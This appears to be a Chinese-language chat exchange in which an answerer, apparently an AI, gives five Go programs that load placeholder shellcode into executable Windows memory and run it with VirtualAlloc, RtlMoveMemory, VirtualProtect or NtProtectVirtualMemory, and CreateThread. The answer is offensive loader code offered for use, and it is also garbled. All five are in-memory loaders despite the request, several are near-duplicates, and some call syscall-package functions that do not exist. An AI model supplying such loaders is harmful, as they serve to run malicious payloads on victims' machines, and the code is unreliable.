有没有其他不同类型的 Go 语言加载 shellcode 的例子?除了内存加载之外,再举五个例子。
以下是五个使用不同的方式加载shellcode的Go语言例子:
- 使用syscall.Syscall将shellcode加载到内存中并执行:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用syscall.Syscall将shellcode加载到内存中并执行,使用VirtualProtect修改内存页属性:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
var oldProtect uint32
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect").Addr(), 4, allocatedMemory, uintptr(len(shellcode)), 0x40, uintptr(unsafe.Pointer(&oldProtect)), 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用syscall.Syscall将shellcode加载到内存中并执行,使用NtProtectVirtualMemory修改内存页属性:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
var oldProtect uint32
syscall.Syscall6(syscall.NewLazyDLL("ntdll.dll").NewProc("NtProtectVirtualMemory").Addr(), 5, uintptr(syscall.GetCurrentProcess()), uintptr(unsafe.Pointer(&allocatedMemory)), uintptr(len(shellcode)), 0x40, uintptr(unsafe.Pointer(&oldProtect)), 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用unsafe.Pointer将shellcode加载到内存中并执行:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory := unsafe.Pointer(syscall.MustVirtualAlloc(nil, uintptr(len(shellcode)), syscall.MEM_COMMIT|syscall.MEM_RESERVE, syscall.PAGE_EXECUTE_READWRITE))
syscall.RtlMoveMemory(allocatedMemory, unsafe.Pointer(&shellcode[0]), len(shellcode))
syscall.Syscall(uintptr(allocatedMemory), 0, 0, 0, 0)
}
- 使用unsafe.Pointer将shellcode加载到内存中并执行,使用VirtualProtect修改内存页属性:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory := unsafe.Pointer(syscall.MustVirtualAlloc(nil, uintptr(len(shellcode)), syscall.MEM_COMMIT|syscall.MEM_RESERVE, syscall.PAGE_READWRITE))
syscall.RtlMoveMemory(allocatedMemory, unsafe.Pointer(&shellcode[0]), len(shellcode))
var oldProtect uint32
syscall.VirtualProtect(allocatedMemory, uintptr(len(shellcode)), syscall.PAGE_EXECUTE_READ, &oldProtect)
syscall.Syscall(uintptr(allocatedMemory), 0, 0, 0, 0)
}
请注意,上述代码仅展示了加载和执行 shellcode 的基本原理,具体的 shellcode 内容和相关的操作系统调用可能因环境而异。